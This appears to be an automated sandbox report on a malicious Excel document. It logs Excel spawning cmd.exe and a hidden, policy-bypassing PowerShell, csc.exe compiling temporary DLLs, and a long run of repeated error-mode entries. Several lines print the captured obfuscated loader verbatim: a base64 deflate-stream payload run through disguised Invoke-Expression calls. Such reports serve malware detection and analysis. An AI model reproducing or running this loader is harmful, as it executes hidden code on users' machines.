Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknown | Process created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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 to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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 to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Compiles C# or VB.Net codeShow sources
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\h2oah0u7.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ua6j8io5.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3ndkwphw.dll

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
